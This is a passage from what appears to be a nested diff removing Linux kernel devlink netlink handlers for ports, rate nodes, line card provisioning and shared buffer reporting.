+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_port_fill(msg, devlink_port,
+-						   DEVLINK_CMD_NEW,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI, cb->extack);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_port_type_set(struct devlink_port *devlink_port,
+-				 enum devlink_port_type port_type)
+-
+-{
+-	int err;
+-
+-	if (!devlink_port->devlink->ops->port_type_set)
+-		return -EOPNOTSUPP;
+-
+-	if (port_type == devlink_port->type)
+-		return 0;
+-
+-	err = devlink_port->devlink->ops->port_type_set(devlink_port,
+-							port_type);
+-	if (err)
+-		return err;
+-
+-	devlink_port->desired_type = port_type;
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-	return 0;
+-}
+-
+-static int devlink_port_function_hw_addr_set(struct devlink_port *port,
+-					     const struct nlattr *attr,
+-					     struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_ops *ops = port->devlink->ops;
+-	const u8 *hw_addr;
+-	int hw_addr_len;
+-
+-	hw_addr = nla_data(attr);
+-	hw_addr_len = nla_len(attr);
+-	if (hw_addr_len > MAX_ADDR_LEN) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port function hardware address too long");
+-		return -EINVAL;
+-	}
+-	if (port->type == DEVLINK_PORT_TYPE_ETH) {
+-		if (hw_addr_len != ETH_ALEN) {
+-			NL_SET_ERR_MSG_MOD(extack, "Address must be 6 bytes for Ethernet device");
+-			return -EINVAL;
+-		}
+-		if (!is_unicast_ether_addr(hw_addr)) {
+-			NL_SET_ERR_MSG_MOD(extack, "Non-unicast hardware address unsupported");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ops->port_function_hw_addr_set) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port doesn't support function attributes");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return ops->port_function_hw_addr_set(port, hw_addr, hw_addr_len,
+-					      extack);
+-}
+-
+-static int devlink_port_fn_state_set(struct devlink_port *port,
+-				     const struct nlattr *attr,
+-				     struct netlink_ext_ack *extack)
+-{
+-	enum devlink_port_fn_state state;
+-	const struct devlink_ops *ops;
+-
+-	state = nla_get_u8(attr);
+-	ops = port->devlink->ops;
+-	if (!ops->port_fn_state_set) {
+-		NL_SET_ERR_MSG_MOD(extack,
+-				   "Function does not support state setting");
+-		return -EOPNOTSUPP;
+-	}
+-	return ops->port_fn_state_set(port, state, extack);
+-}
+-
+-static int devlink_port_function_set(struct devlink_port *port,
+-				     const struct nlattr *attr,
+-				     struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *tb[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1];
+-	int err;
+-
+-	err = nla_parse_nested(tb, DEVLINK_PORT_FUNCTION_ATTR_MAX, attr,
+-			       devlink_function_nl_policy, extack);
+-	if (err < 0) {
+-		NL_SET_ERR_MSG_MOD(extack, "Fail to parse port function attributes");
+-		return err;
+-	}
+-
+-	attr = tb[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR];
+-	if (attr) {
+-		err = devlink_port_function_hw_addr_set(port, attr, extack);
+-		if (err)
+-			return err;
+-	}
+-	/* Keep this as the last function attribute set, so that when
+-	 * multiple port function attributes are set along with state,
+-	 * Those can be applied first before activating the state.
+-	 */
+-	attr = tb[DEVLINK_PORT_FN_ATTR_STATE];
+-	if (attr)
+-		err = devlink_port_fn_state_set(port, attr, extack);
+-
+-	if (!err)
+-		devlink_port_notify(port, DEVLINK_CMD_PORT_NEW);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	int err;
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_TYPE]) {
+-		enum devlink_port_type port_type;
+-
+-		port_type = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_TYPE]);
+-		err = devlink_port_type_set(devlink_port, port_type);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_FUNCTION]) {
+-		struct nlattr *attr = info->attrs[DEVLINK_ATTR_PORT_FUNCTION];
+-		struct netlink_ext_ack *extack = info->extack;
+-
+-		err = devlink_port_function_set(devlink_port, attr, extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_port_split_doit(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	u32 count;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_SPLIT_COUNT))
+-		return -EINVAL;
+-	if (!devlink->ops->port_split)
+-		return -EOPNOTSUPP;
+-
+-	count = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_SPLIT_COUNT]);
+-
+-	if (!devlink_port->attrs.splittable) {
+-		/* Split ports cannot be split. */
+-		if (devlink_port->attrs.split)
+-			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split further");
+-		else
+-			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split");
+-		return -EINVAL;
+-	}
+-
+-	if (count < 2 || !is_power_of_2(count) || count > devlink_port->attrs.lanes) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid split count");
+-		return -EINVAL;
+-	}
+-
+-	return devlink->ops->port_split(devlink, devlink_port, count,
+-					info->extack);
+-}
+-
+-static int devlink_nl_cmd_port_unsplit_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (!devlink->ops->port_unsplit)
+-		return -EOPNOTSUPP;
+-	return devlink->ops->port_unsplit(devlink, devlink_port, info->extack);
+-}
+-
+-static int devlink_port_new_notify(struct devlink *devlink,
+-				   unsigned int port_index,
+-				   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	lockdep_assert_held(&devlink->lock);
+-	devlink_port = devlink_port_get_by_index(devlink, port_index);
+-	if (!devlink_port) {
+-		err = -ENODEV;
+-		goto out;
+-	}
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_NEW,
+-				   info->snd_portid, info->snd_seq, 0, NULL);
+-	if (err)
+-		goto out;
+-
+-	return genlmsg_reply(msg, info);
+-
+-out:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_new_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink_port_new_attrs new_attrs = {};
+-	struct devlink *devlink = info->user_ptr[0];
+-	unsigned int new_port_index;
+-	int err;
+-
+-	if (!devlink->ops->port_new || !devlink->ops->port_del)
+-		return -EOPNOTSUPP;
+-
+-	if (!info->attrs[DEVLINK_ATTR_PORT_FLAVOUR] ||
+-	    !info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port flavour or PCI PF are not specified");
+-		return -EINVAL;
+-	}
+-	new_attrs.flavour = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_FLAVOUR]);
+-	new_attrs.pfnum =
+-		nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		/* Port index of the new port being created by driver. */
+-		new_attrs.port_index =
+-			nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-		new_attrs.port_index_valid = true;
+-	}
+-	if (info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]) {
+-		new_attrs.controller =
+-			nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]);
+-		new_attrs.controller_valid = true;
+-	}
+-	if (new_attrs.flavour == DEVLINK_PORT_FLAVOUR_PCI_SF &&
+-	    info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]) {
+-		new_attrs.sfnum = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]);
+-		new_attrs.sfnum_valid = true;
+-	}
+-
+-	err = devlink->ops->port_new(devlink, &new_attrs, extack,
+-				     &new_port_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_port_new_notify(devlink, new_port_index, info);
+-	if (err && err != -ENODEV) {
+-		/* Fail to send the response; destroy newly created port. */
+-		devlink->ops->port_del(devlink, new_port_index, extack);
+-	}
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_port_del_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	unsigned int port_index;
+-
+-	if (!devlink->ops->port_del)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_INDEX)) {
+-		NL_SET_ERR_MSG_MOD(extack, "Port index is not specified");
+-		return -EINVAL;
+-	}
+-	port_index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-	return devlink->ops->port_del(devlink, port_index, extack);
+-}
+-
+-static int
+-devlink_nl_rate_parent_node_set(struct devlink_rate *devlink_rate,
+-				struct genl_info *info,
+-				struct nlattr *nla_parent)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	const char *parent_name = nla_data(nla_parent);
+-	const struct devlink_ops *ops = devlink->ops;
+-	size_t len = strlen(parent_name);
+-	struct devlink_rate *parent;
+-	int err = -EOPNOTSUPP;
+-
+-	parent = devlink_rate->parent;
+-	if (parent && len) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Rate object already has parent.");
+-		return -EBUSY;
+-	} else if (parent && !len) {
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_parent_set(devlink_rate, NULL,
+-							devlink_rate->priv, NULL,
+-							info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_parent_set(devlink_rate, NULL,
+-							devlink_rate->priv, NULL,
+-							info->extack);
+-		if (err)
+-			return err;
+-
+-		refcount_dec(&parent->refcnt);
+-		devlink_rate->parent = NULL;
+-	} else if (!parent && len) {
+-		parent = devlink_rate_node_get_by_name(devlink, parent_name);
+-		if (IS_ERR(parent))
+-			return -ENODEV;
+-
+-		if (parent == devlink_rate) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent to self is not allowed");
+-			return -EINVAL;
+-		}
+-
+-		if (devlink_rate_is_node(devlink_rate) &&
+-		    devlink_rate_is_parent_node(devlink_rate, parent->parent)) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Node is already a parent of parent node.");
+-			return -EEXIST;
+-		}
+-
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_parent_set(devlink_rate, parent,
+-							devlink_rate->priv, parent->priv,
+-							info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_parent_set(devlink_rate, parent,
+-							devlink_rate->priv, parent->priv,
+-							info->extack);
+-		if (err)
+-			return err;
+-
+-		refcount_inc(&parent->refcnt);
+-		devlink_rate->parent = parent;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_rate_set(struct devlink_rate *devlink_rate,
+-			       const struct devlink_ops *ops,
+-			       struct genl_info *info)
+-{
+-	struct nlattr *nla_parent, **attrs = info->attrs;
+-	int err = -EOPNOTSUPP;
+-	u64 rate;
+-
+-	if (attrs[DEVLINK_ATTR_RATE_TX_SHARE]) {
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_SHARE]);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_tx_share_set(devlink_rate, devlink_rate->priv,
+-							  rate, info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_tx_share_set(devlink_rate, devlink_rate->priv,
+-							  rate, info->extack);
+-		if (err)
+-			return err;
+-		devlink_rate->tx_share = rate;
+-	}
+-
+-	if (attrs[DEVLINK_ATTR_RATE_TX_MAX]) {
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_RATE_TX_MAX]);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			err = ops->rate_leaf_tx_max_set(devlink_rate, devlink_rate->priv,
+-							rate, info->extack);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			err = ops->rate_node_tx_max_set(devlink_rate, devlink_rate->priv,
+-							rate, info->extack);
+-		if (err)
+-			return err;
+-		devlink_rate->tx_max = rate;
+-	}
+-
+-	nla_parent = attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME];
+-	if (nla_parent) {
+-		err = devlink_nl_rate_parent_node_set(devlink_rate, info,
+-						      nla_parent);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static bool devlink_rate_set_ops_supported(const struct devlink_ops *ops,
+-					   struct genl_info *info,
+-					   enum devlink_rate_type type)
+-{
+-	struct nlattr **attrs = info->attrs;
+-
+-	if (type == DEVLINK_RATE_TYPE_LEAF) {
+-		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_leaf_tx_share_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the leafs");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_leaf_tx_max_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the leafs");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
+-		    !ops->rate_leaf_parent_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the leafs");
+-			return false;
+-		}
+-	} else if (type == DEVLINK_RATE_TYPE_NODE) {
+-		if (attrs[DEVLINK_ATTR_RATE_TX_SHARE] && !ops->rate_node_tx_share_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX share set isn't supported for the nodes");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_TX_MAX] && !ops->rate_node_tx_max_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "TX max set isn't supported for the nodes");
+-			return false;
+-		}
+-		if (attrs[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] &&
+-		    !ops->rate_node_parent_set) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Parent set isn't supported for the nodes");
+-			return false;
+-		}
+-	} else {
+-		WARN(1, "Unknown type of rate object");
+-		return false;
+-	}
+-
+-	return true;
+-}
+-
+-static int devlink_nl_cmd_rate_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate = info->user_ptr[1];
+-	struct devlink *devlink = devlink_rate->devlink;
+-	const struct devlink_ops *ops = devlink->ops;
+-	int err;
+-
+-	if (!ops || !devlink_rate_set_ops_supported(ops, info, devlink_rate->type))
+-		return -EOPNOTSUPP;
+-
+-	err = devlink_nl_rate_set(devlink_rate, ops, info);
+-
+-	if (!err)
+-		devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_rate_new_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_rate *rate_node;
+-	const struct devlink_ops *ops;
+-	int err;
+-
+-	ops = devlink->ops;
+-	if (!ops || !ops->rate_node_new || !ops->rate_node_del) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Rate nodes aren't supported");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (!devlink_rate_set_ops_supported(ops, info, DEVLINK_RATE_TYPE_NODE))
+-		return -EOPNOTSUPP;
+-
+-	rate_node = devlink_rate_node_get_from_attrs(devlink, info->attrs);
+-	if (!IS_ERR(rate_node))
+-		return -EEXIST;
+-	else if (rate_node == ERR_PTR(-EINVAL))
+-		return -EINVAL;
+-
+-	rate_node = kzalloc(sizeof(*rate_node), GFP_KERNEL);
+-	if (!rate_node)
+-		return -ENOMEM;
+-
+-	rate_node->devlink = devlink;
+-	rate_node->type = DEVLINK_RATE_TYPE_NODE;
+-	rate_node->name = nla_strdup(info->attrs[DEVLINK_ATTR_RATE_NODE_NAME], GFP_KERNEL);
+-	if (!rate_node->name) {
+-		err = -ENOMEM;
+-		goto err_strdup;
+-	}
+-
+-	err = ops->rate_node_new(rate_node, &rate_node->priv, info->extack);
+-	if (err)
+-		goto err_node_new;
+-
+-	err = devlink_nl_rate_set(rate_node, ops, info);
+-	if (err)
+-		goto err_rate_set;
+-
+-	refcount_set(&rate_node->refcnt, 1);
+-	list_add(&rate_node->list, &devlink->rate_list);
+-	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
+-	return 0;
+-
+-err_rate_set:
+-	ops->rate_node_del(rate_node, rate_node->priv, info->extack);
+-err_node_new:
+-	kfree(rate_node->name);
+-err_strdup:
+-	kfree(rate_node);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_rate_del_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *rate_node = info->user_ptr[1];
+-	struct devlink *devlink = rate_node->devlink;
+-	const struct devlink_ops *ops = devlink->ops;
+-	int err;
+-
+-	if (refcount_read(&rate_node->refcnt) > 1) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Node has children. Cannot delete node.");
+-		return -EBUSY;
+-	}
+-
+-	devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
+-	err = ops->rate_node_del(rate_node, rate_node->priv, info->extack);
+-	if (rate_node->parent)
+-		refcount_dec(&rate_node->parent->refcnt);
+-	list_del(&rate_node->list);
+-	kfree(rate_node->name);
+-	kfree(rate_node);
+-	return err;
+-}
+-
+-struct devlink_linecard_type {
+-	const char *type;
+-	const void *priv;
+-};
+-
+-static int devlink_nl_linecard_fill(struct sk_buff *msg,
+-				    struct devlink *devlink,
+-				    struct devlink_linecard *linecard,
+-				    enum devlink_command cmd, u32 portid,
+-				    u32 seq, int flags,
+-				    struct netlink_ext_ack *extack)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	struct nlattr *attr;
+-	void *hdr;
+-	int i;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX, linecard->index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_LINECARD_STATE, linecard->state))
+-		goto nla_put_failure;
+-	if (linecard->type &&
+-	    nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE, linecard->type))
+-		goto nla_put_failure;
+-
+-	if (linecard->types_count) {
+-		attr = nla_nest_start(msg,
+-				      DEVLINK_ATTR_LINECARD_SUPPORTED_TYPES);
+-		if (!attr)
+-			goto nla_put_failure;
+-		for (i = 0; i < linecard->types_count; i++) {
+-			linecard_type = &linecard->types[i];
+-			if (nla_put_string(msg, DEVLINK_ATTR_LINECARD_TYPE,
+-					   linecard_type->type)) {
+-				nla_nest_cancel(msg, attr);
+-				goto nla_put_failure;
+-			}
+-		}
+-		nla_nest_end(msg, attr);
+-	}
+-
+-	if (linecard->nested_devlink &&
+-	    devlink_nl_put_nested_handle(msg, linecard->nested_devlink))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_linecard_notify(struct devlink_linecard *linecard,
+-				    enum devlink_command cmd)
+-{
+-	struct devlink *devlink = linecard->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_LINECARD_NEW &&
+-		cmd != DEVLINK_CMD_LINECARD_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_linecard_fill(msg, devlink, linecard, cmd, 0, 0, 0,
+-				       NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_linecard_get_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard = info->user_ptr[1];
+-	struct devlink *devlink = linecard->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	mutex_lock(&linecard->state_lock);
+-	err = devlink_nl_linecard_fill(msg, devlink, linecard,
+-				       DEVLINK_CMD_LINECARD_NEW,
+-				       info->snd_portid, info->snd_seq, 0,
+-				       info->extack);
+-	mutex_unlock(&linecard->state_lock);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_linecard_get_dumpit(struct sk_buff *msg,
+-					      struct netlink_callback *cb)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		mutex_lock(&devlink->linecards_lock);
+-		list_for_each_entry(linecard, &devlink->linecard_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			mutex_lock(&linecard->state_lock);
+-			err = devlink_nl_linecard_fill(msg, devlink, linecard,
+-						       DEVLINK_CMD_LINECARD_NEW,
+-						       NETLINK_CB(cb->skb).portid,
+-						       cb->nlh->nlmsg_seq,
+-						       NLM_F_MULTI,
+-						       cb->extack);
+-			mutex_unlock(&linecard->state_lock);
+-			if (err) {
+-				mutex_unlock(&devlink->linecards_lock);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		mutex_unlock(&devlink->linecards_lock);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static struct devlink_linecard_type *
+-devlink_linecard_type_lookup(struct devlink_linecard *linecard,
+-			     const char *type)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	int i;
+-
+-	for (i = 0; i < linecard->types_count; i++) {
+-		linecard_type = &linecard->types[i];
+-		if (!strcmp(type, linecard_type->type))
+-			return linecard_type;
+-	}
+-	return NULL;
+-}
+-
+-static int devlink_linecard_type_set(struct devlink_linecard *linecard,
+-				     const char *type,
+-				     struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_linecard_ops *ops = linecard->ops;
+-	struct devlink_linecard_type *linecard_type;
+-	int err;
+-
+-	mutex_lock(&linecard->state_lock);
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-
+-	linecard_type = devlink_linecard_type_lookup(linecard, type);
+-	if (!linecard_type) {
+-		NL_SET_ERR_MSG_MOD(extack, "Unsupported line card type provided");
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (linecard->state != DEVLINK_LINECARD_STATE_UNPROVISIONED &&
+-	    linecard->state != DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card already provisioned");
+-		err = -EBUSY;
+-		/* Check if the line card is provisioned in the same
+-		 * way the user asks. In case it is, make the operation
+-		 * to return success.
+-		 */
+-		if (ops->same_provision &&
+-		    ops->same_provision(linecard, linecard->priv,
+-					linecard_type->type,
+-					linecard_type->priv))
+-			err = 0;
+-		goto out;
+-	}
+-
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING;
+-	linecard->type = linecard_type->type;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-	err = ops->provision(linecard, linecard->priv, linecard_type->type,
+-			     linecard_type->priv, extack);
+-	if (err) {
+-		/* Provisioning failed. Assume the linecard is unprovisioned
+-		 * for future operations.
+-		 */
+-		mutex_lock(&linecard->state_lock);
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		mutex_unlock(&linecard->state_lock);
+-	}
+-	return err;
+-
+-out:
+-	mutex_unlock(&linecard->state_lock);
+-	return err;
+-}
+-
+-static int devlink_linecard_type_unset(struct devlink_linecard *linecard,
+-				       struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	mutex_lock(&linecard->state_lock);
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being provisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONING) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is currently being unprovisioned");
+-		err = -EBUSY;
+-		goto out;
+-	}
+-	if (linecard->state == DEVLINK_LINECARD_STATE_PROVISIONING_FAILED) {
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		err = 0;
+-		goto out;
+-	}
+-
+-	if (linecard->state == DEVLINK_LINECARD_STATE_UNPROVISIONED) {
+-		NL_SET_ERR_MSG_MOD(extack, "Line card is not provisioned");
+-		err = 0;
+-		goto out;
+-	}
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONING;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-	err = linecard->ops->unprovision(linecard, linecard->priv,
+-					 extack);
+-	if (err) {
+-		/* Unprovisioning failed. Assume the linecard is unprovisioned
+-		 * for future operations.
+-		 */
+-		mutex_lock(&linecard->state_lock);
+-		linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-		linecard->type = NULL;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		mutex_unlock(&linecard->state_lock);
+-	}
+-	return err;
+-
+-out:
+-	mutex_unlock(&linecard->state_lock);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_linecard_set_doit(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard = info->user_ptr[1];
+-	struct netlink_ext_ack *extack = info->extack;
+-	int err;
+-
+-	if (info->attrs[DEVLINK_ATTR_LINECARD_TYPE]) {
+-		const char *type;
+-
+-		type = nla_data(info->attrs[DEVLINK_ATTR_LINECARD_TYPE]);
+-		if (strcmp(type, "")) {
+-			err = devlink_linecard_type_set(linecard, type, extack);
+-			if (err)
+-				return err;
+-		} else {
+-			err = devlink_linecard_type_unset(linecard, extack);
+-			if (err)
+-				return err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_sb_fill(struct sk_buff *msg, struct devlink *devlink,
+-			      struct devlink_sb *devlink_sb,
+-			      enum devlink_command cmd, u32 portid,
+-			      u32 seq, int flags)
+-{
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_SIZE, devlink_sb->size))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_POOL_COUNT,
+-			devlink_sb->ingress_pools_count))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_POOL_COUNT,
+-			devlink_sb->egress_pools_count))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_TC_COUNT,
+-			devlink_sb->ingress_tc_count))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_TC_COUNT,
+-			devlink_sb->egress_tc_count))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
